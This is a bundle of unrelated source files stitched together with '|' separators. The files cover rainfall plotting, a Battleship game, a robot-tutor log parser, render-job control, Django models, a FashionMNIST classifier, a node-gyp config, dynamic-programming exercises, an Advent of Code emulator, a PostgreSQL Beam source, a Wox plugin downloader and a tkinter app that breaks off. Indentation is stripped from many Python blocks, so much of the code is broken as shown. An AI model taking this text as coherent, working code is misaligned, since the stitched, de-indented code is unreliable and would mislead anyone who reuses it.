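# pair.update_data()  # refreshes bid/ask/last and volume fields from the API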
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Thu Feb 15 11:54:26 2018
@author: ian
"""
import calendar
import datetime as dt
import matplotlib.pyplot as plt
import numpy as np
import os
import pandas as pd
from scipy.stats import linregress
import pdb
def get_date_from_multi_index(idx):
return [dt.date(idx.get_level_values(0)[i], idx.get_level_values(1)[i], 1)
for i in xrange(len(idx))]
def get_date_from_dataframe_vars(df):
return [dt.date(df.Year[i], df.Month[i], df.Day[i])
for i in xrange(len(df))]
path = '/home/ian/Dropbox/Work/Manuscripts/Writing/Gatum+_respiration/Data'
id_dict = {'Gatum': '089043', 'Cavendish': '089009'}
f_list = filter(lambda x: 'Data' in x, os.listdir(path))
paths_dict = {key: os.path.join(path, [x for x in f_list if id_dict[key] in x][0])
for key in id_dict}
df_list = []
for name in paths_dict:
df = pd.read_csv(paths_dict[name])
df.index = get_date_from_dataframe_vars(df)
df = df[['Rainfall amount (millimetres)', 'Quality']]
df.columns = ['{}_rainfall_mm'.format(name), '{}_Quality'.format(name)]
df_list.append(df)
begin_date = max([df.index[0] for df in df_list])
end_date = max([df.index[-1] for df in df_list])
new_index = pd.date_range(begin_date, end_date, freq = 'D')
combined_df = pd.concat([df.reindex(new_index) for df in df_list], axis = 1)
month_df = combined_df.dropna().groupby([lambda x: x.year,
lambda y: y. month]).sum()
params = linregress(month_df['Cavendish_rainfall_mm'],
month_df['Gatum_rainfall_mm'])
combined_df.loc[np.isnan(combined_df.Gatum_rainfall_mm),
'Gatum_rainfall_mm'] = (combined_df['Cavendish_rainfall_mm'] *
params.slope + params.intercept)
combined_s = combined_df.loc[~((combined_df.index.month==2) &
(combined_df.index.day==29)), 'Gatum_rainfall_mm']
compare_df = pd.DataFrame({'Long-term mean':
combined_s.groupby([lambda x: x.dayofyear]).mean()[:-1]})
year_list = ['2015', '2016', '2017', '2018']
for year in year_list:
temp_s = combined_s.loc[year]
temp_s.index = compare_df.index
compare_df[year] = temp_s
sums_df = compare_df.sum().round(1)
fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2, figsize = (12, 12))
fig.patch.set_facecolor('white')
month_locs = np.cumsum([1] + map(lambda x: calendar.monthrange(2015, x)[1],
np.arange(1,12,1)))
month_labels = map(lambda x: calendar.month_name[x][0], np.arange(1,13,1))
xlim = [1, 365]
ylim = [0, round(compare_df[['2015', '2016', '2017', '2018']].max().max() * 1.05)]
yblim = [0, 1100]
d = {'2015': ax1, '2016': ax2, '2017': ax3, '2018': ax4}
for i, year in sorted(enumerate(d.keys())):
ax = d[year]
if i < 2:
ax.set_ylabel('Daily precipitation (mm)')
ax.set_xlim(xlim)
ax.set_ylim(ylim)
ax.set_xticks(month_locs)
ax.set_xticklabels(month_labels)
ax_b = ax.twinx()
if i >= 2:
ax_b.set_ylabel('Cumulative precipitation (mm)')
ax_b.set_ylim(yblim)
ax_b.fill_between(compare_df.index, np.tile(0, len(compare_df)),
compare_df['Long-term mean'].cumsum(),
alpha = 0.3, color = 'grey')
ax.bar(compare_df.index, compare_df[year], color = 'black')
ax_b.plot(compare_df.index, compare_df[year].cumsum().interpolate(),
color = 'black')
text = '{}mm'.format(str(sums_df.loc[year]))
ax.text(0.08, 0.9, year, horizontalalignment = 'left',
verticalalignment = 'center', transform=ax.transAxes,
fontweight = 'bold')
ax.text(0.37, 0.9, text, horizontalalignment = 'center',
verticalalignment = 'center', transform=ax.transAxes)
for loc in month_locs[3], month_locs[6], month_locs[9]:
ax.axvline(loc, color = 'grey', lw = 0.9, ls = ':')
plt.savefig('/home/ian/Dropbox/Work/Manuscripts/Writing/Gatum+_respiration/'
'Latex/Figs/Precip.png', bbox_inches = 'tight')
|
import functions
class Ship:
def __init__(self, bow, horizontal, length):
self.bow = bow
self.horizontal = horizontal
self.length = length
self.hit = [(i, j, False) for j in range(self.bow[1], self.bow[1]+self.length[1])
for i in range(self.bow[0], self.bow[0]+self.length[0])]
def shoot_at(self, tuple_):
tuple1 = tuple_ + (False,)
for i, tuple2 in enumerate(self.hit):
if tuple2 == tuple1:
self.hit[i] = tuple_ + (True,)
class Field:
def __init__(self):
self.__ships = [[None for i in range(10)]for j in range(10)]
self.field, field_data = functions.field_generate()
for ship in field_data:
ship1 = Ship(ship[0], ship[1], ship[2])
for coord in ship1.hit:
self.__ships[coord[0]][coord[1]] = ship1
def shoot_at(self, tuple1):
a = self.__ships[tuple1[0]][tuple1[1]]
if self.__ships[tuple1[0]][tuple1[1]] is None:
self.__ships[tuple1[0]][tuple1[1]] = "shooted"
elif type(self.__ships[tuple1[0]][tuple1[1]]) == Ship:
Ship.shoot_at(self.__ships[tuple1[0]][tuple1[1]], tuple1)
for i in self.__ships[tuple1[0]][tuple1[1]].hit:
if i[2] == False:
break
else:
for i in range(a.bow[0] - 1, a.bow[0] + a.length[0] + 1):
for j in range(a.bow[1] - 1, a.bow[1] + a.length[1] + 1):
                        if (i, j, True) not in a.hit and (0 <= i <= 9) \
                                and (0 <= j <= 9):
self.__ships[i][j] = "shooted"
def field_without_ships(self):
str1 = " A B C D E F G H I J\n"
for i, data in enumerate(self.__ships):
str1 += '%+2s' % str(i+1)
for j, sym in enumerate(data):
if sym == "shooted":
a = '*'
elif type(sym) == Ship and (i, j, True) in sym.hit:
a = "x"
else:
a = " "
str1 += " " + a
str1 += '\n'
return str1
def field_with_ships(self):
return self.__ships
class Player:
def __init__(self, name):
self.__name = name
def read_position(self):
x = str(input("Player {}, enter move"
.format(self.__name)).lower())
x2 = ord(x[0]) - ord('a')
x1 = int(x[1:])-1
return tuple([x1, x2])
last_iterat = 0
class Game:
def __init__(self, fields, players):
global last_iterat
last_iterat += 1
self.fields = fields
self.players = players
self.iterat = last_iterat
self.current_player = self.players[self.iterat % 2]
def read_position(self):
return self.current_player.read_position()
def field_without_ships(self, index):
a = self.fields[index-1].field_without_ships()
return a
def field_with_ships(self, index):
return self.fields[index-1].field_with_ships()
field1 = Field()
field2 = Field()
player1 = Player(1)
player2 = Player(2)
game = Game([field1, field2], [player1, player2])
while True:
for i in range(2):
a = game.players[i].read_position()
game.fields[i-1].shoot_at(a)
print(game.field_without_ships(i))
|
# This module will allow the tester to use log data to run tests and get profiles
import re
import sys
import os
import csv
import datetime
import SimulationObjects as Sim
def readLog(fileName, fileDirectory, graphFlag=False):
# return a list of stepLists
# Metadata of the step lists follows this order:
# (problem, stepList) tuple, user, correctness, line (in the log)
# timeStamp, currentState tuple
filePath = None
if fileDirectory:
filePath = os.path.join(fileDirectory, fileName)
else:
filePath = fileName
with open(filePath, 'r') as log:
pointPattern = re.compile(r'\((?P<x>-{0,1}?[0-9]+), (?P<y>-{0,1}?[0-9]+)\)')
deletePattern = re.compile(r'\'label\':\'(?P<label>.*)\'')
timeStampPattern = re.compile(r'(?P<month>[0-9]{1,2})/(?P<day>[0-9]{1,2})/(?P<year>[0-9]{4}) - (?P<hour>[0-9]{1,2}):(?P<minute>[0-9]{1,2}):(?P<second>[0-9]{1,2})')
# This pattern should catch the robot's position and the
# last point placed.
currentStatePattern = re.compile(r'^R,(?P<x>-?[0-9]{1,2}),(?P<y>-?[0-9]{1,2}),(?P<rot>-?[0-9]{1,3}).*(:P[0-9],(?P<px>-?[0-9](\.[0-9]{2})?),(?P<py>-?[0-9](\.[0-9]{2}))$)?')
user = ''
logReader = csv.reader(log)
currentStepList = []
StepLists = []
TimeStamps = []
problem = None
currentState = []
lastRowTS = None
condition = ''
for line, row in enumerate(logReader):
if len(row) == 11:
# we expect the correct format hereafter
if 'prompt' in row or 'attribution' in row or 'checked emotions' in row:
continue
stateMatch = currentStatePattern.search(row[3])
timeStampMatch = timeStampPattern.search(row[0])
timeStamp = datetime.datetime(year=int(timeStampMatch.group('year')), month=int(timeStampMatch.group('month')), day=int(timeStampMatch.group('day')), hour=int(timeStampMatch.group('hour')), minute=int(timeStampMatch.group('minute')), second = int(timeStampMatch.group('second')))
TimeStamps.append(timeStamp)
if row[10]:
# get the session condition
condition = row[10]
# the state tuple is as follows:
                # x position, y position, rotation, last point x, last point y
if stateMatch:
if stateMatch.group('px') and stateMatch.group('py'):
currentState = (float(stateMatch.group('x')), float(stateMatch.group('y')), int(stateMatch.group('rot')), float(stateMatch.group('px')), float(stateMatch.group('py')))
else:
currentState = (float(stateMatch.group('x')), float(stateMatch.group('y')), int(stateMatch.group('rot')), None, None)
else:
                    currentState = (None, None, None, None, None)
if row[8] != user:
user = row[8]
if 'moveDistance' in row[1]:
distance = int(row[2])
label = 'Move ' + str(distance)
name = 'moveDistance'
op = Sim.Op(distance=distance, angle=None)
pid = row[7]
step = Sim.Step(label=label, name=name, op=op, problemId=pid, state=currentState)
currentStepList.append(step)
elif 'turnAngle' == row[1]:
angle = int(row[2])
label = 'Turn '+ str(angle)
name = 'turnAngle'
pid = row[7]
op = Sim.Op(distance=None, angle=angle)
step = Sim.Step(label=label, name=name, op=op, problemId=pid, state=currentState)
currentStepList.append(step)
elif 'plotPoint' in row[1]:
pid = row[7]
op = None
step = Sim.Step(label='Plot Point', name='plotPoint', op=op, problemId=pid, state=currentState)
currentStepList.append(step)
##### META STEPS #####
#
# THIS SECTION ISNT USEFUL, delete does nothing!
# if 'Deleted step from list' in row:
# # remove the last step
# # NOTE some deletes dont change the robot's position!
# name = 'delete'
# match = deletePattern.search(row[3])
# if match:
# label = match.group('label')
# print(label)
# op = None
# step = Sim.Step(label=label, name=name, op=op)
# currentStepList.append(step)
#
elif 'reset' in row or 'replay' in row:
# NOTE we may want to just ingore this
# print(currentStepList, 'reset', line)
label = 'reset'
name = 'reset'
step = Sim.Step(label=label, name=name, op=None, state=currentState)
currentStepList.append(step)
elif 'Deleted step from list' in row:
                    label = 'delete'
name = 'delete'
step = Sim.Step(label=label, name=name, op=None, state=currentState)
currentStepList.append(step)
elif 'Refresh' in row:
label = 'refresh'
name = 'refresh'
op = None
step = Sim.Step(label=label, name=name, op=op, state=currentState)
currentStepList.append(step)
elif 'correctness feedback' in row:
# determine the problem as well
# print('check')
correct = None
if 'correct' in row:
correct = True
else:
correct = False
probId = row[7]
problemString = row[6]
match = pointPattern.search(problemString)
if match:
x = int(match.group('x'))
y = int(match.group('y'))
point = Sim.Point('P1', x, y)
else:
point = Sim.Point('P1', 0, 0)
solution = Sim.Solution([], [point])
problem = Sim.Problem(probId=probId, solution=solution)
StepLists.append( {'problem':problem, 'stepList':list(currentStepList), 'user':user, 'correct':correct, 'line':line, 'timeStamps':TimeStamps, 'condition':condition} )
TimeStamps = []
currentStepList = []
stateList = []
currentProblem = -1
return StepLists
if __name__ == '__main__':
readLog('p34.csv', 'test_logs')
|
from Deadline.Scripting import *
import json
# This script is for Dealine Online Manager, maintained by elisha.
def __main__(dlArgs, qsArgs):
action = qsArgs.get('action', None)
job_id = qsArgs.get('id', None)
if action is None or job_id is None:
return ('Lacks of parameters', 404)
rep = RepositoryUtils
job = rep.GetJob(job_id, True)
if action == 'suspend':
rep.SuspendJob(job)
elif action == 'resume':
rep.ResumeJob(job)
elif action == 'resumefailed':
rep.ResumeFailedJob(job)
elif action == 'requeue':
rep.RequeueJob(job)
elif action == 'resubmit':
rep.ResubmitJob(job, job.JobFrames, job.JobFramesPerTask, False)
elif action == 'delete':
rep.DeleteJob(job)
return json.dumps({'delete': True})
elif action == 'complete':
rep.CompleteJob(job)
job = WebServiceUtils.GetJobInfo(job_id)
obj = {
'name': job['Name'],
'batch': job['BatchName'],
'plugin': job['PluginName'],
'user': job['UserName'],
'status': job['Status'],
'priority': job['Priority'],
'id': job['JobId'],
'submitDate': job['SubmitDateTimeString'],
'startDate': job['StartedDateTimeString'],
'completedDate': job['CompletedDateTimeString'],
'firstFrame': job['FirstFrame'],
'lastFrame': job['LastFrame'],
'taskCount': job['TaskCount'],
'pool': job['Pool'],
'completedTasks': job['JobCompletedTasks'],
'queuedTasks': job['JobQueuedTasks'],
'suspendedTasks': job['JobSuspendedTasks'],
'renderingTasks': job['JobRenderingTasks'],
'failedTasks': job['JobFailedTasks'],
'pendingTasks': job['JobPendingTasks'],
'errors': job['ErrorReports'],
'singleProgress': job['SingleTaskProgress'],
}
return json.dumps(obj)
|
from reef import database as db
from datetime import datetime
class BookRecord(db.Model):
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
book_id = db.Column(db.Integer, db.ForeignKey('book.id'), nullable=False)
reader_id = db.Column(db.Integer, db.ForeignKey('reader.id'), nullable=False)
created = db.Column(db.DateTime, index=True, default=datetime.utcnow)
user = db.relationship('User', backref=db.backref('book_records', lazy='dynamic'))
|
import matplotlib.pyplot as plt
import pytorch_lightning as pl
import torch
import torch.nn.functional as F
import torch.nn as nn
import torchvision
from torchvision import transforms
from torch.utils.data import DataLoader, random_split
class TwoLayerNet(pl.LightningModule):
def __init__(self, hparams, input_size=1 * 28 * 28, hidden_size=512, num_classes=10):
super().__init__()
self.hparams = hparams
self.model = nn.Sequential(
nn.Linear(input_size, hidden_size),
nn.Sigmoid(),
nn.Linear(hidden_size, num_classes),
)
def forward(self, x):
# flatten the image first
N, _, _, _ = x.shape
x = x.view(N, -1)
x = self.model(x)
return x
def training_step(self, batch, batch_idx):
images, targets = batch
# forward pass
out = self.forward(images)
# loss
loss = F.cross_entropy(out, targets)
# accuracy
_, preds = torch.max(out, 1) # convert output probabilities to predicted class
acc = preds.eq(targets).sum().float() / targets.size(0)
# logs
tensorboard_logs = {'loss': loss, 'acc': acc}
return {'loss': loss, 'log': tensorboard_logs}
def validation_step(self, batch, batch_idx):
images, targets = batch
# forward pass
out = self.forward(images)
# loss
loss = F.cross_entropy(out, targets)
# accuracy
_, preds = torch.max(out, 1)
acc = preds.eq(targets).sum().float() / targets.size(0)
if batch_idx == 0:
self.visualize_predictions(images, out.detach(), targets)
return {'val_loss': loss, 'val_acc': acc}
def validation_end(self, outputs):
avg_loss = torch.stack([x['val_loss'] for x in outputs]).mean()
avg_acc = torch.stack([x['val_acc'] for x in outputs]).mean()
tensorboard_logs = {'val_loss': avg_loss, 'val_acc': avg_acc}
return {'val_loss': avg_loss, 'log': tensorboard_logs}
def visualize_predictions(self, images, preds, targets):
class_names = ['t-shirts', 'trouser', 'pullover', 'dress', 'coat', 'sandal', 'shirt', 'sneaker', 'bag', 'ankle boot']
# determine size of the grid based on given batch size
        num_rows = int(torch.tensor(len(images)).float().sqrt().floor())
fig = plt.figure(figsize=(10, 10))
for i in range(len(images)):
plt.subplot(num_rows ,len(images) // num_rows + 1, i+1)
plt.imshow(images[i].squeeze(0))
plt.title(class_names[torch.argmax(preds, axis=-1)[i]] + f'\n[{class_names[targets[i]]}]')
plt.axis('off')
self.logger.experiment.add_figure('predictions', fig, global_step=self.global_step)
def prepare_data(self):
# download
transform = transforms.Compose([transforms.ToTensor(),
transforms.Normalize((0.5,), (0.5,))])
fashion_mnist_train = torchvision.datasets.FashionMNIST(root='../datasets', train=True,
download=True, transform=transform)
fashion_mnist_test = torchvision.datasets.FashionMNIST(root='../datasets', train=False,
download=True, transform=transform)
# train/val split
torch.manual_seed(0)
train_dataset, val_dataset = random_split(fashion_mnist_train, [50000, 10000])
torch.manual_seed(torch.initial_seed())
# assign to use in dataloaders
self.train_dataset = train_dataset
self.val_dataset = val_dataset
self.test_dataset = fashion_mnist_test
@pl.data_loader
def train_dataloader(self):
return DataLoader(self.train_dataset, shuffle=True, batch_size=self.hparams["batch_size"])
@pl.data_loader
def val_dataloader(self):
return DataLoader(self.val_dataset, batch_size=self.hparams["batch_size"])
def configure_optimizers(self):
optim = torch.optim.SGD(self.model.parameters(), self.hparams["learning_rate"], momentum=0.9)
return optim
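# Hypothetical training sketch (hparams keys match those read above; the Trainer
# call assumes the same pytorch_lightning version implied by the pl.data_loader
# decorator used here):
# model = TwoLayerNet({"batch_size": 64, "learning_rate": 1e-2})
# trainer = pl.Trainer(max_epochs=5)
# trainer.fit(model)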
|
from __future__ import unicode_literals
from django.db import models
class Customer(models.Model):
customer_id = models.CharField(max_length=100,primary_key=True)
customer_name = models.CharField(max_length=100)
customer_email = models.CharField(max_length=50)
customer_phone = models.CharField(max_length=10)
customer_password = models.CharField(max_length=100)
def __unicode__(self):
return self.customer_id
class Meta:
db_table = 'customer_tbl'
|
{
"targets": [
{
"target_name": "addon",
"sources": [ "src/extension.cc" ],
"include_dirs": [
"<!(node -e \"require('nan')\")",
],
"variables": {
"use_pkg_config": "<!(pkg-config --exists libtcmalloc || echo no)"
},
"conditions": [
[ "use_pkg_config=='no'", {
"libraries": [
"-ltcmalloc",
"-lprofiler"
]
}, {
"include_dirs": [
"<!@(pkg-config libprofiler libtcmalloc --cflags-only-I | sed s/-I//g)"
],
"libraries": [
"<!@(pkg-config libprofiler libtcmalloc --libs-only-l)"
],
"library_dirs": [
"<!@(pkg-config libprofiler libtcmalloc --libs-only-L | sed s/-L//g)"
]
}]
]
}
]
}
|
#Longest Common Subsequence
"""LCS Problem Statement: Given two sequences, find the length of longest
subsequence present in both of them. A subsequence is a sequence that appears
in the same relative order, but not necessarily contiguous. For example,
'abc',
'abg', 'bdf', 'aeg', 'acefg', .. etc are subsequences of 'abcdefg'."""
'''
def lcs(x,y,lenx,leny):
if lenx == 0 or leny == 0:
return 0
if x[lenx - 1] == y[leny - 1]:
return 1+lcs(x,y,lenx-1, leny - 1)
else:
return max(lcs(x,y,lenx, leny - 1), lcs(x,y,lenx-1, leny))
X = "AGGTAB"
Y = "GXTXAYB"
print "Length of LCS is ", lcs(X , Y, len(X), len(Y))
'''
'''
def lcs_mem(x,y,lenx,leny):
array = [[-1]*(leny+1) for i in range(lenx+1) ]
#print(array.shape)
if lenx == 0 or leny == 0:
return 0
if array[lenx][leny] != -1:
return array[lenx][leny]
if x[lenx - 1] == y[leny - 1]:
array[lenx][leny] = 1+lcs_mem(x,y,lenx-1, leny - 1)
return array[lenx][leny]
else:
array[lenx][leny] = max(lcs_mem(x,y,lenx, leny - 1), lcs_mem(x,y,lenx-1, leny))
return array[lenx][leny]
X = "AGGTAB"
Y = "GXTXAYB"
print "Length of LCS is ", lcs_mem(X , Y, len(X), len(Y))
'''
#bottom-up (tabulation) approach
def lcs_topDown(x, y, lenx, leny):
    array = [[-1]*(leny+1) for i in range(lenx+1)]
    S = ''
    for i in range(lenx+1):
        for j in range(leny+1):
            if i == 0 or j == 0:
                array[i][j] = 0
            elif x[i - 1] == y[j - 1]:
                array[i][j] = 1 + array[i-1][j-1]
                S += x[i-1]
                print(x[i-1])
            else:
                array[i][j] = max(array[i][j - 1], array[i-1][j])
    print("final array", array)
    print("String", S)  # note: S collects every matched character, not a reconstructed LCS
    return array[lenx][leny]
import numpy as np
Y = "ABCDAF"
X = "ACBCF"
array = [[-1]*(len(Y)+1) for i in range(len(X)+1) ]
print(array,np.array(array).shape)
print "Length of LCS is ", lcs_topDown(X , Y, len(X), len(Y))
|
# Generated by Django 3.1.5 on 2021-01-30 16:53
import django.contrib.gis.db.models.fields
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='gpxFile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100, verbose_name='Title')),
('gpx_file', models.FileField(upload_to='gpx_files/%Y/%m/%d')),
],
),
migrations.CreateModel(
name='Incidence',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20)),
('location', django.contrib.gis.db.models.fields.PointField(srid=4326)),
],
),
migrations.CreateModel(
name='WorldBorder',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('area', models.IntegerField()),
('pop2005', models.IntegerField(verbose_name='Population 2005')),
('fips', models.CharField(max_length=2, null=True, verbose_name='FIPS Code')),
('iso2', models.CharField(max_length=2, verbose_name='2 Digit ISO')),
('iso3', models.CharField(max_length=3, verbose_name='3 Digit ISO')),
('un', models.IntegerField(verbose_name='United Nations Code')),
('region', models.IntegerField(verbose_name='Region Code')),
('subregion', models.IntegerField(verbose_name='Sub-Region Code')),
('lon', models.FloatField()),
('lat', models.FloatField()),
('mpoly', django.contrib.gis.db.models.fields.MultiPolygonField(srid=4326)),
],
),
migrations.CreateModel(
name='GPXTrack',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('track', django.contrib.gis.db.models.fields.MultiLineStringField(srid=4326)),
('gpx_file', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='reporter.gpxfile')),
],
),
migrations.CreateModel(
name='GPXPoint',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=50, verbose_name='Name')),
('description', models.CharField(blank=True, max_length=250, verbose_name='Description')),
('point', django.contrib.gis.db.models.fields.PointField(srid=4326)),
('gpx_file', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='reporter.gpxfile')),
],
),
]
|
# 5-1
# class Carre:
# def __init__(self, cote):
# self.cote = cote
# a = Carre(10)
# print(a.cote)
# class Carre:
# def __init__(self, cote):
# self.unCote = cote
# self.perimetre = self.fctPerimetre()
# self.aire = self.unCote * self.unCote
# def fctPerimetre(self):
# return self.unCote * 4
# if __name__ == '__main__' :
# a = Carre(10)
# print("Le carré à un côté d'une longueur de " + str(a.unCote) + ", une aire de " + str(a.aire) + " et un périmètre de " + str(a.perimetre) + ".")
# class Carre:
# def __init__(self, cote):
# self.unCote = cote
# self.perimetre = self.fctPerimetre()
# self.aire = self.unCote * self.unCote
# def fctPerimetre(self):
# return self.unCote * 4
# if __name__ == '__main__' :
# a = Carre(10)
# b = Carre(5)
# print(a.aire + b.aire)
# class Carre:
# def __init__(self, cote):
# self.unCote = cote
# self.perimetre = self.fctPerimetre()
# self.aire = self.unCote * self.unCote
# def fctPerimetre(self):
# return self.unCote * 4
# if __name__ == '__main__' :
# a = Carre(10)
# b = Carre(5)
# print(a.aire - b.aire)
|
"""An Apache Beam bounded source for PostgreSQL"""
from typing import Union
from apache_beam.io import iobase
from apache_beam.options.value_provider import ValueProvider
from postgres_connector.splitters import BaseSplitter
from postgres_connector.client import PostgresClient
from postgres_connector.utils import clean_query
from postgres_connector.utils import get_runtime_value
class PostgresSource(iobase.BoundedSource):
"""A source object of mysql."""
def __init__(
self,
query: Union[str, ValueProvider],
host: Union[str, ValueProvider],
database: Union[str, ValueProvider],
user: Union[str, ValueProvider],
password: Union[str, ValueProvider],
port: Union[int, ValueProvider],
splitter: BaseSplitter,
):
super().__init__()
self._query = query
self._host = host
self._database = database
self._user = user
self._password = password
self._port = port
self._is_initialized = False
self._config = {
"host": self._host,
"database": self._database,
"user": self._user,
"password": self._password,
"port": self._port,
}
self._splitter = splitter
def estimate_size(self):
"""Implement :class:`~apache_beam.io.iobase.BoundedSource.estimate_size`"""
if not self._is_initialized:
self._initialize()
return self._splitter.estimate_size()
def get_range_tracker(self, start_position, stop_position):
"""Implement :class:`~apache_beam.io.iobase.BoundedSource.get_range_tracker`"""
if not self._is_initialized:
self._initialize()
return self._splitter.get_range_tracker(start_position, stop_position)
def read(self, range_tracker):
"""Implement :class:`~apache_beam.io.iobase.BoundedSource.read`"""
for record in self._splitter.read(range_tracker):
yield record
def split(self, desired_bundle_size, start_position=None, stop_position=None):
"""Implement :class:`~apache_beam.io.iobase.BoundedSource.split`"""
if not self._is_initialized:
self._initialize()
for split in self._splitter.split(desired_bundle_size, start_position, stop_position):
yield split
def _initialize(self):
for k, v in self._config.items():
self._config[k] = get_runtime_value(v)
self.query = clean_query(get_runtime_value(self._query))
self.client = PostgresClient(self._config)
self._splitter.build_source(self)
self._is_initialized = True
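# --- Usage sketch (not part of the original module) ---
# A hedged example of reading from this source inside a pipeline; the concrete
# splitter below is an assumption, since only BaseSplitter is imported here.
#
# import apache_beam as beam
# with beam.Pipeline() as p:
#     rows = p | "ReadFromPostgres" >> beam.io.Read(PostgresSource(
#         query="SELECT id, name FROM users",
#         host="localhost", database="mydb", user="postgres",
#         password="secret", port=5432,
#         splitter=BaseSplitter(),  # in practice, a concrete splitter subclass
#     ))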
|
# Day 14: Docking Data
# <ryc> 2021
import re
def inputdata():
stream = open('day_14_2020.input')
data = []
for line in stream:
        record = re.findall(r'(mask) = ([01X]+)|(mem)\[(\d+)\] = (\d+)', line)
if record[0][0] == 'mask':
maskN = 0
maskX = 0
maskv = 0x800000000
maskV = []
for char in record[0][1]:
maskN *= 2
maskX *= 2
if char == 'X':
maskX += 1
maskV.insert(0,maskv)
else:
maskN += int(char)
maskv >>= 1
data.append(['mask', maskN, maskX, maskV])
else:
data.append([record[0][2], int(record[0][3]), int(record[0][4])])
stream.close()
return data
def emulator_v1(program):
mem = dict()
maskN = 0
maskX = ~ 0
for line in program:
if line[0] == 'mask':
maskN = line[1]
maskX = line[2]
else:
mem[line[1]] = ( line[2] & maskX ) | maskN
value = 0
for record in mem.values():
value += record
return value
def emulator_v2(program):
mem = dict()
maskN = 0
maskX = ~ 0
maskV = []
for line in program:
if line[0] == 'mask':
maskN = line[1]
maskX = line[2]
maskV = [ 0 ]
for i in line[3]:
branch = []
for j in maskV:
branch.append(i + j)
maskV.extend(branch)
else:
base = ( line[1] | maskN ) & ~ maskX
for offset in maskV:
mem[base + offset] = line[2]
value = 0
for record in mem.values():
value += record
return value
if __name__ == '__main__':
print('\n14: Docking Data')
program = inputdata()
print('\nemulator v1 =',emulator_v1(program))
print('\nemulator v2 =',emulator_v2(program))
|
import os, wget
import zipfile
PLUGINS_PATH = os.path.join(os.environ['APPDATA'], 'Wox', 'Plugins')
plugins_url = [
'http://api.wox.one/media/plugin/E2D2C23B084D41D1B6F60EC79D62CAH6/Wox.Plugin.IPAddress-275940ee-7ada-4a8a-b874-309e6034f39f.wox',
'http://api.wox.one/media/plugin/5C0BFEC0DF7011E695980800200C9A66/YoutubeQuery-086bc2f7-a21f-4f76-9f29-349fb7534ce4.wox',
'http://api.wox.one/media/plugin/ca8c0c3dea2e4f75833482489587d33d/Simple Web Search-999fc5f3-cc79-4ce4-81df-da1ae0497a65.wox',
'http://api.wox.one/media/plugin/39F78C8D0A5B408595753263017A039A/Wox.Plugin.PirateBay-fd2ad92a-af92-4810-b555-49711397fee4.wox',
'http://api.wox.one/media/plugin/13F6E017E889C82D4BAB954BB1E0D19C/Wox.Plugin.KickassTorrent-95bb9266-3844-4bef-a057-82ef4692e09d.wox',
'http://api.wox.one/media/plugin/6c22cffe6b3546ec9087abe149c4a575/Wox.Plugin.Github-1.1.0-c3e6b661-2252-4061-83ae-5890ade1592a.wox',
'http://api.wox.one/media/plugin/5B7E53D506844D2D8B7001AA19F5EF8F/Wox.Plugin.Todos-566b9986-dda3-437a-aa8b-fcf9b953aedc.wox',
'http://api.wox.one/media/plugin/BB36CF20434311E6BDF40800200C9A66/Wox.Plugin.Giphy-7100cf9a-4be7-467f-951f-d15d843ecae7.wox',
'http://api.wox.one/media/plugin/8d80430bbaeb4e49a002213c3bd88c66/Wox.Plugin.Timestamp-1.0-4d9c8352-c081-4aca-80d3-c10e167ae5b1.wox',
'http://api.wox.one/media/plugin/D2D2C23B084D411DB66EE0C79D6C2A6C/Wox.Plugin.ProcessKiller-5991960e-418a-49ad-9fa1-e9b4dab2d23c.wox'
]
for pl_url in plugins_url:
woxfile = wget.download(pl_url, out=PLUGINS_PATH)
with zipfile.ZipFile(woxfile, 'r') as zip_ref:
zip_ref.extractall(os.path.join(PLUGINS_PATH, woxfile.split('/')[-1][:-4]))
|
import sys
n , m = [int(e) for e in input().strip().split()]
v = [int(e) for e in sys.stdin.readline().strip().split()]
w = [int(e) for e in sys.stdin.readline().strip().split()]
V = [[int(e) for e in sys.stdin.readline().strip().split()] for i in range(n+1)]
x = [0 for i in range(n)] ; count = 0
while V[n][m] != 0:
if V[n][m] == V[n-1][m]:
n -= 1
elif V[n][m] == V[n-1][m-w[n-1]] + v[n-1]:
x[n-1] = 1
count += 1
m -= w[n-1]
n -= 1
if V[n][m] == v[n-1]:
count += 1
x[n-1] = 1
break
print(count)
for i in range(len(x)):
if x[i] == 1: print(i+1, end=" ")
"""def Knapsack(i,v,w,W,d = dict()):
if W == 0: return 0
if W < 0: return float('-inf')
if i == len(v): return float('-inf')
if (i,W) in d: return d[(i,W)]
a = Knapsack(i+1,v,w,W-w[i],d)
b = Knapsack(i+1,v,w,W,d)
r = max(a,b)
d[(i,W)] = r
return r
"""
|
import tkinter
import tkinter.ttk as ttk
import editor
from util_frames import NewGameFrame, LoadGameFrame
from cbs_window import *
from world import world, set_world
from main_frames import PlayerActorFrame, CurrentLocationFrame
import os
import shutil
class Application(ttk.Frame):
def __init__(self, master=None):
ttk.Frame.__init__(self, master, width=1000, height=500)
self.grid()
self.grid_propagate(0)
self.file_menu = None
self.menu_bar = None
self.create_top_menu()
self.main_notebook = ttk.Notebook(self)
self.main_notebook.grid()
self.editor_frame = editor.EditorMasterFrame(self)
self.main_notebook.add(self.editor_frame, text='Editor')
def create_top_menu(self):
top = self.winfo_toplevel()
self.menu_bar = tkinter.Menu(top)
top['menu'] = self.menu_bar
self.file_menu = tkinter.Menu(self.menu_bar, tearoff=0)
self.menu_bar.add_cascade(label='File', menu=self.file_menu)
self.file_menu.add_command(label='New', command=self._b_new_game)
self.file_menu.add_command(label='Load', command=self._b_load_game)
def _b_new_game(self):
w = CBSWindow(self, 'New', 10, 10)
new_game_frame = NewGameFrame(w, self)
new_game_frame.grid()
new_game_frame.grab_set()
def _b_load_game(self):
        w = CBSWindow(self, 'Load', 10, 10)
